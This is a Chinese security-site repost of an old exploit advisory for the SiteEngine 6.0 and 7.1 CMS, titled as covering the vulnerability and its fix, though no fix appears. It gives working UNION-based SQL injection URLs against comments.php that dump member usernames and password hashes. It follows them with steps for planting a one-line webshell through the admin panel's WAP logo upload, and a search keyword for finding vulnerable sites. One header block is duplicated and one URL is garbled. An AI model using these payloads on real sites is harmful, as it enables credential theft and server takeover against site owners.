SiteEngine 6.0 &7.1 SQL注入漏洞及修复

没穿底裤 2019年12月31日23:06:08评论447 views字数 2361阅读7分52秒阅读模式
摘要

#############################################################################
#标题:   SiteEngine 6.0 SQL注入漏洞
#日期:    2010-11-25
#作者: Beach
#Team:    www.linux520.com
#厂商: www.siteengine.netwww.boka.cn
#关键字:    "Powered by SiteEngine"   //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:

#############################################################################
#标题:   SiteEngine 6.0 SQL注入漏洞
#日期:    2010-11-25
#作者: Beach
#Team:    www.linux520.com
#厂商: www.siteengine.netwww.boka.cn
#关键字:    "Powered by SiteEngine"   //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:

[php]

php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5">http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, ... ,24,25,26+from+boka_members%23[/php]

#############################################################################
[*]上Shell:

管理后台:http://server/admin/
系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) --->
确定--->马上浏览--->看图片属性即为一句话地址

#############################################################################

 

?

#############################################################################
#标题:   SiteEngine 7.1 SQL注入漏洞
#日期:    2010-11-25
#作者:    Beach
#Team:    www.linux520.com
#厂商:    www.siteengine.netwww.boka.cn
#关键字:    "Powered by SiteEngine"   //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启,默认开启
#############################################################################
[*]利用:

企业门户版本:
[php]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23[/php]

[php]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23[/php]

可能字段数不一样, 自己尝试
==============================================================================
电子商务版本:

[php]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23[/php]
#############################################################################

其他版本类似
#############################################################################
[*]上Shell:

管理后台:http://server/admin/
系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) --->
确定--->马上浏览--->看图片属性即为一句话地址
#############################################################################

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:06:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SiteEngine 6.0 &7.1 SQL注入漏洞及修复http://cn-sec.com/archives/75042.html

发表评论

匿名网友 填写信息